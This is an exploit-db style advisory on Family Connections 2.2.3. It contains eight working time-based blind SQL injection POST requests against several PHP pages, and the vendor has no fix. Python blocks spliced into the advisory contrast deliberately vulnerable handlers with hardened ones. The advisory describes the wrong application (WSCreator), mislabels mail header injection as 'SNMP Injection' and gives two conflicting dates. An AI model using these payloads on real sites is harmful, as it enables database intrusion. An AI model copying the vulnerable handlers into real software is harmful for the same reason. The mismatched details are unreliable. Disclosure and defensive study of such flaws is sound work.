family connections 2.2.3 – Multiple Vulnerabilities

  • Author: Salvatore Fresta
    Date: 2010-05-10
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/12557/
  • Family Connections 2.2.3 Multiple Remote Vulnerabilities
    
     Name               Family Connections
     Vendor             http://www.familycms.com
     Versions Affected  2.2.3
    
     Author             Salvatore Fresta aka Drosophila
     Website            http://www.salvatorefresta.net
     Contact            salvatorefresta [at] gmail [dot] com
     Date               2010-10-05
    
    X. INDEX
    
     I.   ABOUT THE APPLICATION
     II.  DESCRIPTION
     III. ANALYSIS
     IV.  SAMPLE CODE
     V.   FIX
     
    
    I. ABOUT THE APPLICATION
    
    Based on one of the world's leading structure and content
    management systems - WebSiteAdmin, WSCreator (WS standing
    for WebSite) is a powerful application for handling multiple
    websites.
    
    
    II. DESCRIPTION
    
    Many fields are not properly sanitised.
    
    
    III. ANALYSIS
    
    Summary:
    
     A) Multiple Blind SQL Injection
     B) Multiple SNMP Injection
     
    
    A) Multiple Blind SQL Injection
    
    All numeric fields that I tested are vulnerable to Blind
    SQL Injection.
    These bugs exist because the numeric SQL fields (numeric
    fields only) are used unquoted and are not properly
    sanitised.
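The defect class above, shown as an added example (not code from the advisory or from Family Connections): an integer id concatenated unquoted into a DELETE statement, beside the hardened handler that type-checks and binds the value. Python with an in-memory SQLite table stands in for the application's PHP/MySQL code; the `recipes` schema and the `-1 OR <condition>` payloads are constructed for the demonstration, and a plain true/false condition replaces the `IF()`/`BENCHMARK()` timing condition because SQLite has neither function.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the application's recipes table (assumed
    schema; the real one is not in the advisory)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE recipes (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO recipes VALUES (?, ?)",
                     [(1, "soup"), (2, "bread"), (3, "stew")])
    conn.commit()
    return conn


def count_recipes(conn):
    return conn.execute("SELECT COUNT(*) FROM recipes").fetchone()[0]


def delete_recipe_vulnerable(conn, id_param):
    """The advisory's defect class: a numeric field dropped into the statement
    unquoted, so whatever the client sent is parsed as SQL.
    Deliberately vulnerable, kept only for the contrast below."""
    conn.execute("DELETE FROM recipes WHERE id=" + id_param)
    conn.commit()


def delete_recipe_hardened(conn, id_param):
    """Type-check first, then bind: the value reaches the engine as an integer
    parameter, never as statement text (PHP analogue: intval()/(int) cast
    plus a prepared statement)."""
    try:
        recipe_id = int(id_param)
    except (TypeError, ValueError):
        raise ValueError("id must be an integer") from None
    conn.execute("DELETE FROM recipes WHERE id=?", (recipe_id,))
    conn.commit()


def demo():
    """Return (rows left after a true condition, rows left after a false
    condition, whether the hardened handler rejected the input, rows left
    after the hardened handler)."""
    db = make_db()
    delete_recipe_vulnerable(db, "-1 OR 1=1")   # true condition: every row matched
    after_true = count_recipes(db)              # 0

    db = make_db()
    delete_recipe_vulnerable(db, "-1 OR 1=2")   # false condition: nothing matched
    after_false = count_recipes(db)             # 3

    db = make_db()
    rejected = False
    try:
        delete_recipe_hardened(db, "-1 OR 1=1")
    except ValueError:
        rejected = True
    after_hardened = count_recipes(db)          # 3: no statement was ever built

    return after_true, after_false, rejected, after_hardened


if __name__ == "__main__":
    print(demo())
```

The difference between the first two results is the oracle a blind injection relies on: the truth of an attacker-chosen condition becomes observable through the query's side effect (or, with `BENCHMARK()`, through its duration). The hardened handler never reaches the engine with a non-integer, so there is nothing to observe.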
    
    
    B) Multiple SNMP Injection
    
    The parameters passed to the mail() PHP function are not
    properly sanitised. This allows an attacker to inject
    arbitrary SNMP headers.
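The mail() header-injection problem described in section B, as an added example (not code from the advisory or from Family Connections): a header block assembled straight from user input beside one built only from validated parts. Python stands in for the PHP mail() call; the header names, the address pattern and the sample input with a smuggled `Bcc:` line are constructed for the demonstration.

```python
import re

# A CR or LF inside a single header value is the injection primitive: the
# receiving mail software treats the text after the line break as a new
# header line. Every mail() argument built from user input needs this check,
# and the request should be rejected rather than silently cleaned.
LINE_BREAK_RE = re.compile(r"[\r\n]")
# One bare address, no whitespace, no angle brackets, no list separators
# (constructed, deliberately strict pattern; not an RFC 5322 parser).
ADDRESS_RE = re.compile(r"[^@\s<>,;]+@[^@\s<>,;]+\.[A-Za-z0-9-]+")


class HeaderInjection(ValueError):
    pass


def validate_header_value(value):
    """Reject a value that would span header lines."""
    if LINE_BREAK_RE.search(value):
        raise HeaderInjection("line break in header value")
    return value


def validate_address(addr):
    """Allow exactly one bare address; fullmatch (not $) so a trailing
    newline cannot slip past the anchor."""
    if not ADDRESS_RE.fullmatch(addr):
        raise HeaderInjection("malformed address: %r" % addr)
    return addr


def headers_unchecked(from_addr, subject):
    """The shape the advisory describes: input concatenated straight into
    the header block (deliberately vulnerable, for contrast only)."""
    return "From: %s\r\nSubject: %s\r\n" % (from_addr, subject)


def headers_hardened(from_addr, subject):
    """Same header block, built only from validated parts."""
    return "From: %s\r\nSubject: %s\r\n" % (
        validate_address(from_addr), validate_header_value(subject))


def header_names(block):
    """Header field names a mail server would see in the block; splitting on
    any line-ending style mirrors the lenient parsing of real mail software."""
    return [line.split(":", 1)[0]
            for line in re.split(r"\r\n|\n|\r", block) if ":" in line]


def demo():
    """Return (field names present in the unchecked block, whether the
    hardened builder rejected the same input)."""
    # Constructed input: a subject that smuggles a second header field.
    from_addr = "user@example.com"
    subject = "hello\r\nBcc: extra@example.invalid"

    seen_unchecked = header_names(headers_unchecked(from_addr, subject))  # Bcc appears
    try:
        headers_hardened(from_addr, subject)
        rejected = False
    except HeaderInjection:
        rejected = True
    return seen_unchecked, rejected


if __name__ == "__main__":
    print(demo())
```

The `header_names()` helper is the reviewer's view of the problem: whatever field names come out of it beyond the ones the code meant to send were supplied by the client. Applying the two validators to every value that feeds a `From`, `Reply-To`, `Cc` or `Subject` header closes the class, independent of which mail transport sits behind mail().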
    
    
    IV. SAMPLE CODE
    
    A) Multiple Blind SQL Injection
    
    POST /path/recipes.php HTTP/1.1
    Host: targethost
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 73
    Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd
    
    delconfirm=1&id=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)
    
    
    POST /path/gallery/upload.php HTTP/1.1
    Host: targethost
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 70
    Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd
    
    category=(SELECT(IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)))
    
    
    POST /path/addressbook.php HTTP/1.1
    Host: targethost
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 74
    Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd
    
    editsubmit=1&aid=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)
    
    
    POST /path/addressbook.php HTTP/1.1
    Host: targethost
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 74
    Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd
    
    editsubmit=1&uid=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)
    
    
    POST /path/calendar.php HTTP/1.1
    Host: targethost
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 67
    Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd
    
    edit=1&id=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)
    
    
    POST /path/calendar.php HTTP/1.1
    Host: targethost
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 73
    Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd
    
    delconfirm=1&id=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)
    
    
    POST /path/familynews.php HTTP/1.1
    Host: targethost
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 73
    Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd
    
    submitedit=1&id=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)
    
    
    POST /path/familynews.php HTTP/1.1
    Host: targethost
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 73
    Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd
    
    delconfirm=1&id=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)
    
    
    V. FIX
    
    No Fix.